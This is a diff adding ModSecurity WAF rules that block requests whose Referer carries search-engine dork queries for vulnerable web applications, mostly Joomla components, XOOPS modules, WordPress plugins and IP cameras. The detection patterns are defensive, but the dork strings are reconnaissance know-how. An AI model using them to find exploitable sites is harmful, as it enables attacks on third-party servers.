+SecRule REQUEST_HEADERS:Referer   "intitle:snc-z20 inurl:home/ " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:snc-rz30 inurl:home/ " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372233,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:viewerframe\?mode=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372234,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:indexframe\.shtml axis" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372236,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_eventcal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372238,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jeauto" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:produtos\.asp\?produto=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372249,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:showcat\.asp\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372254,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_amresurrected" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372256,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:jscripts/tiny_mce/plugins/tinybrowser/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_sqlreport" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:imageview5" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372294,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_tophotelmodule" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372305,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/rmgallery/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/debaser/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/xfsection/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/lykos_reviews/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372334,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site powered by guppy \| site créé avec guppy \+inurl:lng=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372336,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by jaws \| powered by the jaws project \| inurl:\?gadget=search" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372362,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "toendacms is free software released under the gnu/gpl license\. \| powered by toendacms -inurl:demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372402,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_gcalendar" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:naviid \+ inurl:liste9" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered\.by\.raidenhttpd \+intitle:index\.of \| inurl:raidenhttpd-admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sysinfo\.cgi ext:cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372412,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "by geeklog created this page in \+seconds \+powered inurl:public_html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:shop\.htm\?shopmgid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372448,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:directory listing for / \+ inurl:webdav tomcat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372465,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_rsmonials" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\?option=com_bsadv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_(?:seyret|ezine|surveymanager|soundset|jbudgetsmagic|icrmbasic)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jp_jobs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/wfsection/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372498,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_annonces" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372501,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_gameserver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372503,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/myconference/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372504,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/glossaire/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372506,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/wflinks" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372507,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/zmagazine/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372510,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_soundset" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372511,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/repository/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372522,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/library/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372523,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_iproperty" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372530,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jsjobs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372531,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/myads/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372538,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_booklibrary" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372539,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/camportail/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372541,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/jobs/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372544,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/tinyevent/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372546,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/kshop/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372551,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_facebook" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372552,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modules/friendfinder/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372555,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_fastball" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372567,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/jobsearchengine/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372570,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_digifolio" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372576,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/jobsearchengine/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372578,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cihuy" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:we_objectid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372596,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\?page=duyurular_detay&id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372602,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/macgurublog_menu/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372603,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ajaxchat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372605,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_mv_restaurantmenumanager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372606,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ijoomla_archive" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372610,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/wp-content/plugins/wp-shopping-cart/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372613,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:e107_plugins/my_gallery" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_lyftenbloggie / powered by lyftenbloggie" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372625,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_n-forms form_id" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372627,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_agenda" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jpodium" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372637,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jejob" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372639,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_cinema" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372643,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_tupinambis" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_elite_experts" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372649,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ezstore" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_xewebtv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372659,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_seminar" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372664,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_hestar" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372673,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:yvcomment" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372680,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_dms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372688,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jb2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372689,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_simplefaq" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372690,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_dateconverter" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372691,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_n-forms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372696,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:inc_webblogmanager\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372698,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jgen" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372699,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/jobsearchengine/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372700,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/wp-content/plugins/fgallery/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372706,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jotloader" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372708,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):parlic design inurl:id" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372710,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_eportfolio" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372711,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jejob" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372716,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_cinema" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372717,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_bfsurvey_profree" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372718,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jembed" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372720,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=articles artid" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372721,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_jepoll" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372722,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
